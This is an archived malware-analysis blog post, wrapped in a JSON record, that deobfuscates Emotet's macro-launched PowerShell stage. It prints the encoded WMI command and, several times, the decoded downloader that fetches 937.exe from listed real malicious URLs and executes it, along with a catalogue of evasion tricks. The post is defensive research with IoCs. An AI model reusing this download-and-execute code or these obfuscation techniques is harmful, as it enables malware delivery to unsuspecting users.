{
	"id": "ac08e186-bccd-4ef6-bbfa-5bbeb42af3d5",
	"created_at": "2026-04-06T00:08:40.441125Z",
	"updated_at": "2026-04-10T03:21:18.691711Z",
	"deleted_at": null,
	"sha1_hash": "e3289fca944318ce7b22b926eddfc900cd190a69",
	"title": "Emotet Technical Analysis - Part 2 PowerShell Unveiled",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 150864,
	"plain_text": "Emotet Technical Analysis - Part 2 PowerShell Unveiled\r\nBy Suleyman Ozarslan, PhD\r\nPublished: 2020-02-07 · Archived: 2026-04-05 23:00:50 UTC\r\nEmotet first appeared in 2014 as a banking trojan built to steal sensitive information and financial credentials.\r\nOver time it evolved into a large, modular botnet that functions like Infrastructure as a Service for cybercrime.\r\nInstead of focusing only on theft, Emotet now delivers additional payloads for partner crews, including other\r\nbanking trojans, credential stealers, spam modules, and ransomware loaders. This shift turned Emotet into a\r\ndistribution hub that fuels many different intrusions across industries.\r\nOperators rely on high volume email campaigns, thread hijacking, and malicious attachments or links to seed new\r\ninfections. Once a system is compromised, Emotet deploys modules for persistence, lateral movement, and\r\ncredential harvesting. It is known for frequent code updates, polymorphic payloads, and fast changing command\r\nand control infrastructure to evade detection. Obfuscation techniques include packed binaries, encrypted\r\nconfigurations, and randomized filenames and services. Emotet has survived takedowns and reemerged with\r\nrefreshed loaders and new delivery partners, which keeps it relevant as a first stage tool in many attack chains.\r\nDefenders can reduce risk by blocking macro enabled documents from the internet, enforcing multifactor\r\nauthentication, and restricting script interpreters where possible. Collect process creation and command line\r\ntelemetry, monitor email for thread hijacking indicators, and alert on unusual outbound connections and sudden\r\nspikes in SMB or SMTP traffic. 
Maintain tested backups and segment critical systems to limit lateral movement.\r\nFinally, validate controls against real Emotet behaviors so you can confirm that detections fire, response\r\nplaybooks work, and access is contained before additional malware is deployed.\r\nWe revealed obfuscated Visual Basic codes in the first part of the Emotet Technical Analysis series . In this second\r\npart, we analyze the PowerShell codes in the Emotet malware document ( PowerShell, MITRE ATT\u0026CK T1086 ).\r\nWe analyzed the following Word document step by step in the first part:\r\nMD5: 515f13034bc4ccf635b026722fd5ef9c\r\nSHA-1: 8925b822e1d86d787b4682d1bb803cf1f5ea7031\r\nSHA-256:\r\nVirusTotal detection rate: 13/61 as of January 21, 2020\r\nNames: ST_28546448.doc, 01856218536426646.doc\r\n1) VBA code analysis\r\nLet's remember the revealed VBA code ( Scripting, MITRE ATT\u0026CK T1064 ):\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 1 of 9\n\n1.\r\nDo While GetObject(winmgmtS:win32_Process).Create(\"Powershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBn\r\nLoop\r\nIn this Do While loop, the Create method of the Win32_Process class is used to create a new process.\r\n💡\r\nThe Create WMI class method creates a new process.\r\nSyntax:\r\nuint32 Create(\r\n [in] string CommandLine,\r\n [in] string CurrentDirectory,\r\n [in] Win32_ProcessStartup ProcessStartupInformation,\r\n [out] uint32 ProcessId\r\n);\r\nThe first variable is the CommandLine to execute. It is a PowerShell command in this code (\r\nPowerShell, MITRE ATT\u0026CK T1086 ).\r\nThe second variable is the CurrentDirectory . If this parameter is NULL , the new process will have the\r\nsame path as the calling process.\r\nThe third variable is ProcessStartupInformation , like winmgmtS:win32_ProcessStartuP in this\r\nexample.\r\n💡 The Win32_ProcessStartup abstract WMI class represents the startup configuration of a Windows-based\r\nprocess. 
The class is defined as a method type definition, which means that it is only used for passing information\r\nto the Create method of the Win32_Process class.\r\nThe last variable is the global process identifier that can be used to identify a process.\r\nTherefore, the VBA code embedded in the Word document executes a PowerShell command using WMI (\r\nWindows Management Instrumentation, MITRE ATT\u0026CK T1047 ).\r\n2) Analyzing the PowerShell parameters\r\nWe'll reveal the obfuscated malicious PowerShell command in this blog. Let's remember the PowerShell\r\ncommand:\r\n2.\r\nPowershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHk\r\nLet's start with the -w parameter and the hidden value: -w hidden . However, there is no parameter\r\nnamed -w according to the official PowerShell documentation . In fact, the -w parameter is completed\r\nby PowerShell as the -WindowStyle parameter because of the parameter substring completion feature of\r\nPowerShell .\r\n💡 PowerShell Parameter Completion: Substrings of parameters like -NoEx (-NoExit), -Executi (-ExecutionPolicy), -w (-WindowStyle) are used in the PowerShell command instead of the complete\r\nparameter string to avoid detection. Because of the way that PowerShell handles parameters, parameter substrings\r\nlike -W, -Wi, -WindowSt, -WindowSty, are all valid ways of specifying an execution argument such as -WindowStyle.\r\n💡 -w can be used for -WindowStyle , because -WindowStyle is the only parameter that starts with -w .\r\nAdversaries commonly use the -WindowStyle parameter with the Hidden value in malicious PowerShell\r\ncommands to avoid detection ( Hidden Window, MITRE ATT\u0026CK T1143 ). Actually, -WindowStyle Hidden does\r\nnot entirely hide the PowerShell command window; it shows the window briefly before hiding it.\r\n💡 The -WindowStyle parameter sets the window style for the session. Valid values are Normal, Minimized,\r\nMaximized, and Hidden .\r\nThe second parameter is -en . Similar to -w , there is no parameter named -en according to the\r\nofficial PowerShell documentation . The -en parameter is completed as the -EncodedCommand parameter by\r\nPowerShell.\r\n💡 The -e parameter cannot be used for -EncodedCommand , because multiple parameters start with -e : -EncodedCommand and -ExecutionPolicy .\r\nTherefore, we must base64-decode the value to reveal the PowerShell command ( Obfuscated Files or\r\nInformation, MITRE ATT\u0026CK T1027 ). After base64 decoding:\r\n3.\r\n$Azytjhzgaumig='Nvxdxgccbng';$Nnyjthcrzjoyv = '937';$Iiqsfpsm='Rogxpgyve';$Ekxhlobqrlh=$env:userprofile+'\\'+$Nny\r\n3) Deobfuscation of the PowerShell code\r\nLet's beautify the code:\r\n4.\r\n$Azytjhzgaumig='Nvxdxgccbng';\r\n$Nnyjthcrzjoyv = '937';\r\n$Iiqsfpsm='Rogxpgyve';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Sbrypywxgcitf='Wpawybiqmj';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\n$Nuoltwfqh='Qrvohdiubfek';\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"Dow`Nloadfi`LE\"($Ndlualuv, $Ekxhlobqrlh);\r\n$Hkukkfoptjdr='Xabdxvkfcma';\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"L`eng`TH\" -ge 29936) {[Diagnostics.Process]::\"s`TARt\"($Ekxhlobqrlh);\r\n$Yzjjfplmkgx='Bxlkqmtxa';\r\nbreak;\r\n$Molchijx='Quatlbdlqvfdp'}}\r\ncatch{}}\r\n$Rckajrxvi='Ejecwargkcl'\r\nThere are garbage variables to obfuscate the code. 
Let's remove them:\r\n5.\r\n$Nnyjthcrzjoyv = '937';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"Dow`Nloadfi`LE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"L`eng`TH\" -ge 29936) {[Diagnostics.Process]::\"s`TARt\"($Ekxhlobqrlh);\r\nbreak;}}\r\ncatch{}}\r\nThere are ` (backtick) characters, which are used to obfuscate the code. In this case, they do not escape any\r\ncharacter, so we can remove them from the code.\r\n💡 The ` (backtick, grave accent) character is PowerShell's escape character.\r\n6.\r\n$Nnyjthcrzjoyv = '937';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh);\r\nbreak;}}\r\ncatch{}}\r\nLet's put '937' in place of $Nnyjthcrzjoyv .\r\n7.\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+'937'+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh);\r\nbreak;}}\r\ncatch{}}\r\nNow, let's get rid of the + characters.\r\n💡 The + operator in PowerShell concatenates two string 
expressions and adds integers.\r\n8.\r\n$Ekxhlobqrlh=$env:userprofile\\937.exe';\r\n$Hirmyhqaltos=\u0026('new-object') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-Item') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh); break;}}\r\ncatch{}}\r\nLet's put ' $env:userprofile\\937.exe ' in place of $Ekxhlobqrlh , and ' \u0026('new-object') NeT.WeBCLiEnT ' in\r\nplace of $Hirmyhqaltos :\r\n9.\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{\u0026('new-object') NeT.WeBCLiEnT.DowNloadfiLE($Ndlualuv, $env:userprofile\\937.e\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env:userprofil\r\nbreak;}}\r\ncatch{}}\r\nLet's change variable names with more readable ones:\r\n10.\r\n$list='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-inclu\r\nforeach($url in $list){try{\u0026('new-object') NeT.WeBCLiEnT.DowNloadfiLE($url, $env:userprofile\\937.exe);\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env:userprofil\r\nbreak;}}\r\ncatch{}}\r\nNow, we must reveal the $list variable. The Split() method is used in this variable.\r\n💡Split(Char[]) splits a string into substrings that are based on the characters in the separator array.\r\nIn this case, the separator is [char]42 , which is equal to the * (asterisk) character. 
Therefore,\r\n11.\r\n$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-\r\nforeach($url in $list){try{\u0026('new-object') NeT.WeBCLiEnT.\"DowNloadfiLE\"($url, $env:userprofile\\937.exe);\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env:userprofil\r\nbreak;}}\r\ncatch{}}\r\nLet's change the random case to PascalCase:\r\n💡 Randomized case : In this old method, uppercase and lowercase letters appear in a random sequence in the\r\ncode, which is useful to bypass weak security controls.\r\n4) Analyzing the deobfuscated PowerShell code\r\n12.\r\n$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-\r\nforeach($url in $list){try{\u0026('new-object') Net.WebClient.DownloadFile($url, $env:userprofile\\937.exe);\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"Length\" -ge 29936) {[Diagnostics.Process]::\"Start\"($env:userprofil\r\nbreak;}}\r\ncatch{}}\r\nThe first line defines the $list array, which includes the following URLs:\r\nhxxp://ahc.mrbdev.com/wp-admin/qp0/\r\nhxxp://e-twow.be/verde/in6k/\r\nhxxps://magnificentpakistan.com/wp-includes/ha5j0b1/\r\nhxxps://www.qwqoo.com/homldw/3piyy4/\r\nhxxp://siwakuposo.com/siwaku2/X5zB0ey/\r\nThe second line, a foreach loop, tries to download a file from the URLs included in the $list array in\r\nthe given order via the Net.WebClient.DownloadFile method and saves the downloaded file to the\r\n$env:userprofile directory as 937.exe .\r\n💡 $env:userprofile indicates the userprofile environment variable that specifies the user's profile directory.\r\nThis directory stores personal data of the user and a typical path is C:\\Users\\Username .\r\nThe third line, an If condition, returns true if the length of the downloaded file 937.exe is greater\r\nthan or 
equal to 29936 bytes by using the -ge 29936 comparison operator ( ge: greater than or equal ).\r\nIf it returns true, the Diagnostics.Process.Start method executes 937.exe , then exits the loop. The\r\nexact file size of 937.exe is 905472 bytes . What could be the reason for comparing the file size? The\r\nanswer is simple: adversaries are trying to figure out whether the file was actually downloaded.\r\n💡 Diagnostics.Process.Start(string fileName) : The Process.Start method of the\r\nSystem.Diagnostics namespace starts a process resource by specifying the name of a document or\r\napplication file and associates the resource with a new Process component.\r\nAdversaries used the Invoke-Item cmdlet to execute the downloaded file in our previous Emotet analysis . Now,\r\nthey are using the Process.Start method instead of Invoke-Item to decrease the detection rate.\r\nIn our analysis, the PowerShell code downloaded 937.exe from the first URL. The other URLs are also active.\r\nMD5: 032a5220e159fcf2f33cc9799f11ade6\r\nSHA-1: 9768eb95d1ac398425fc5eced31b5f83025c6faf\r\nSHA-256: cb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f\r\nVirusTotal detection rate: 6/73 as of January 21, 2020, 49/73 as of February 6, 2020\r\nNames: 937.exe, 565.exe\r\nSummary\r\nThe purpose of this second part of the Emotet Technical Analysis Series is to analyze the PowerShell code\r\nincluded in the heavily obfuscated Visual Basic macros revealed in the first article . Briefly, this PowerShell code\r\ndownloads a file from a list of URLs, then executes the file as a process.\r\nAdversaries used the following techniques in the PowerShell code for obfuscation and evasion:\r\n1. WMI was used to create a process instead of cmd . If WMI activity is not monitored, it is hard to detect\r\nthe creation of the malicious process.\r\n2. 
Substrings of parameters were used instead of the complete parameter names. PowerShell\r\ncompletes the incomplete version of a parameter. -w was used for -WindowStyle and -en was used for\r\n-EncodedCommand .\r\n3. The -WindowStyle parameter was used with the Hidden value to hide the PowerShell command\r\nwindow.\r\n4. The Base64-encoded version of the PowerShell command was used with the -EncodedCommand parameter.\r\n5. Garbage variable assignments were used to obfuscate the code.\r\n6. The ` (backtick) character was used to obfuscate strings. For example, Dow`Nloadfi`LE was used\r\ninstead of DowNloadfiLE .\r\n7. The + operator was used to concatenate fragmented strings. As an example, 'new-o'+'bj'+'ect' was used\r\ninstead of new-object to evade weak security controls.\r\n8. URLs were joined with the * (asterisk) character to evade weak URL regexes of security controls. Then,\r\nthe Split() method was used to separate the URLs.\r\n9. The [char] conversion was used to obfuscate characters. For example, [char]42 was used for the *\r\n(asterisk) character.\r\n10. Randomized case (e.g., NeT.WeBCLiEnT ) was used to bypass weak security controls.\r\n11. 
The Process.Start method was used to execute the downloaded file instead of a more common\r\nexecution method such as the Invoke-Item cmdlet.\r\nWhat is next?\r\nWe will analyze the behavior of the executed file 937.exe in the third part of the Emotet Technical Analysis\r\nseries.\r\nMITRE’s ATT\u0026CK Techniques Observed\r\nExecution: T1086 PowerShell, T1064 Scripting, T1047 Windows Management Instrumentation\r\nDefense Evasion: T1027 Obfuscated Files or Information, T1143 Hidden Windows, T1064 Scripting\r\nIndicators of Compromise (IoCs)\r\nSource: https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled"
	],
	"report_names": [
		"emotet-technical-analysis-part-2-powershell-unveiled"
	],
	"threat_actors": [],
	"ts_created_at": 1775434120,
	"ts_updated_at": 1775791278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e3289fca944318ce7b22b926eddfc900cd190a69.pdf",
		"text": "https://archive.orkl.eu/e3289fca944318ce7b22b926eddfc900cd190a69.txt",
		"img": "https://archive.orkl.eu/e3289fca944318ce7b22b926eddfc900cd190a69.jpg"
	}
}